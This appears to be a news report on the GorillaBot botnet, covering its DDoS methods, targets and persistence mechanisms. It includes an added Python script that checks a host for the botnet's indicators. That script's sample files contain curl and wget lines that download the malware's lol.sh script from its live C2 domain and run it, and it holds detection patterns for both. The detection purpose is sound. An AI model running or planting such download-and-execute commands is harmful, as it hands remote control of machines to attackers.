Researchers studying cybersecurity have uncovered a new type of botnet malware known as Gorilla (also known as GorillaBot), which takes its cues from the publicly available source code for the Mirai botnet.
According to the cybersecurity company NSFOCUS, which discovered the activity last month, the botnet “issued over 300,000 attack commands, with a shocking attack density” between September 4 and September 27, 2024. On average, it issued no fewer than 20,000 commands per day, each intended to mount a distributed denial-of-service (DDoS) attack.
The botnet is reported to have targeted universities, government websites, telecoms, banks, and the gaming and gambling industries across more than 100 countries. The most frequently targeted nations so far are China, the United States, Canada, and Germany.
The Beijing-based company stated that Gorilla’s main DDoS attack methods are UDP flood, ACK BYPASS flood, Valve Source Engine (VSE) flood, SYN flood, and ACK flood. It added that because UDP is a connectionless protocol, source IP addresses can be spoofed arbitrarily, which lets the botnet generate large volumes of traffic.
The botnet supports a variety of CPU architectures, including ARM, MIPS, x86_64, and x86, and it can connect to one of five pre-configured command-and-control (C2) servers to receive DDoS commands.
In an unusual twist, the malware also embeds a function to exploit a security flaw in Apache Hadoop YARN RPC to achieve remote code execution. According to Alibaba Cloud and Trend Micro, that flaw has been exploited in the wild since 2021.
To persist on the host, the malware creates a service file named custom.service in the “/etc/systemd/system/” directory and configures it to launch automatically each time the system boots.
The service’s task is to download and run a shell script called “lol.sh” from a remote server at “pen.gorillafirewall[.]su”. Comparable commands are also added to the “/etc/inittab,” “/etc/profile,” and “/boot/bootcmd” files, so that the shell script is downloaded and executed during system startup or at user login.
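The persistence locations and indicators named above (custom.service under /etc/systemd/system, /etc/inittab, /etc/profile, /boot/bootcmd, the lol.sh script name and the pen.gorillafirewall[.]su domain) are enough to write a simple host check. The script below is an added defender-side example, not NSFOCUS code or anything from the malware itself; the file contents in SAMPLE_FILES are constructed to exercise the checks, and the exact shape of the injected command (a curl/wget one-liner) is an assumption, since the article does not quote it.

```python
"""Scan the persistence locations GorillaBot is reported to use for the
indicators named in the article. Added example, not NSFOCUS code; the
SAMPLE_FILES contents are constructed, not captured from a real host."""
import re
from pathlib import Path

# Persistence files the article names.
PERSISTENCE_PATHS = [
    "/etc/systemd/system/custom.service",
    "/etc/inittab",
    "/etc/profile",
    "/boot/bootcmd",
]

# Indicators from the article. The C2 domain is kept defanged in the
# source and refanged only when the pattern is compiled.
C2_DOMAIN_DEFANGED = "pen.gorillafirewall[.]su"
INDICATORS = {
    "script_name": re.compile(r"\blol\.sh\b"),
    "c2_domain": re.compile(re.escape(C2_DOMAIN_DEFANGED.replace("[.]", "."))),
}


def scan_content(path, text):
    """Return (path, indicator, line_no, line) for every indicator hit in one file."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.append((path, name, line_no, line.strip()))
    return hits


def scan_files(files):
    """files maps path -> contents; returns all hits across the mapping."""
    hits = []
    for path, text in files.items():
        hits.extend(scan_content(path, text))
    return hits


def read_persistence_files(root="/"):
    """Read the real persistence files under root; missing files are skipped.
    Pass a mounted image or chroot directory as root to scan offline."""
    found = {}
    for p in PERSISTENCE_PATHS:
        fp = Path(root) / p.lstrip("/")
        if fp.is_file():
            found[p] = fp.read_text(errors="replace")
    return found


# Constructed sample contents mimicking what the article describes.
# The ExecStart / inittab command lines are assumed shapes, not quoted from NSFOCUS.
SAMPLE_FILES = {
    "/etc/systemd/system/custom.service": (
        "[Unit]\nDescription=custom\n\n[Service]\n"
        "ExecStart=/bin/sh -c 'curl -s http://pen.gorillafirewall.su/lol.sh | sh'\n\n"
        "[Install]\nWantedBy=multi-user.target\n"
    ),
    "/etc/profile": "# /etc/profile: system-wide .profile file\nexport PATH=/usr/local/bin:$PATH\n",
    "/etc/inittab": (
        "id:3:initdefault:\n"
        "sh:2345:once:/bin/sh -c 'wget -qO- http://pen.gorillafirewall.su/lol.sh | sh'\n"
    ),
}

if __name__ == "__main__":
    # Scan the constructed sample; swap in read_persistence_files() for a live host.
    for path, indicator, line_no, line in scan_files(SAMPLE_FILES):
        print(f"{path}:{line_no} [{indicator}] {line}")
```

Matching on the script name and domain is deliberately narrow: it catches the reported campaign, while any unexpected edit to /etc/inittab, /etc/profile or /boot/bootcmd on a device that should never change them is itself worth alerting on regardless of which domain appears.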
“It introduced various DDoS attack methods and used encryption algorithms commonly employed by the Keksec group to hide key information, while employing multiple techniques to maintain long-term control over IoT devices and cloud hosts, demonstrating a high level of counter-detection awareness as an emerging botnet family,” NSFOCUS stated.